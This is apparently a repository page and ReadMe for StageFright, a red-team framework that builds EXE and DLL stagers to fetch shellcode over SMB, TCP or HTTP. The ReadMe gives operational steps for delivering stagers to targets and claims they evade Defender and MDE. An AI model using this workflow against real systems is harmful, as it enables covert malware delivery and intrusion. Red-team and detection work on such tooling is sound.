assume-breach
6c0a0ce77a
Delete StageFright/StageFright/StageFright/Resources/SigThief directory
|
1 рік тому | |
|---|---|---|
| .. | ||
| StageFright | 1 рік тому | |
| ReadMe.md | 2 роки тому | |
ReadMe.md
StageFright is a staged payload framework that allows the user to run customized staged payloads over various protocols. The framework is based on my blog article found here: https://medium.com/@assume-breach/home-grown-red-team-hosting-encrypted-stager-shellcode-1dc5e06eaeb3
Right now, the only protocols in the framework are SMB, TCP and HTTP. I might do FTP, but that seems a little outdated.
At this time, the tool will give you both DLLs and EXEs.
This is a replacement for the Shareable tool I uploaded a little while ago. Eventually, this tool will be merged into the Harriet tool, but for now, this is what I have finished. You can watch out for updates on Twitter as I will tweet out when new features and things have been added.
How To Use
bash StageFright.sh
Go through the menus and select your stager.
SMB Stager
For SMB enter the values for the share/shared folder that is writable.
Upload your shellcode file to the share/shared folder.
Run the tool.
If you get onto another machine on the network that has access to the shared/shared folder you can retrieve the shellcode file and get a beacon. I ran the tool on my DC which has access to the shared folder.
TCP Stager
Go through the script.
You will have to host the TCP server. I have provided a python script to spin this up. You can find it in StageFright/StageFright/TCP. As of right now the script does not replace the values in the python script (it will over the next couple of days) so you will need to replace those values by hand.
Run the script to start the TCP server.
Transfer the EXE stager to the target and execute.
Everything should work out of box on Kali but for Mint/Ubuntu you will need to install MingW64 for compilation. This is the beginning of the project. Mainly releasing this so I have a base to go off of. No OPSEC considerations have been made at this time. Native APIs are used in some cases. Whatever AV/EDR that this gets past at this point is unknown. It will get past Defender and MDE (P1 trial license) with no alerts.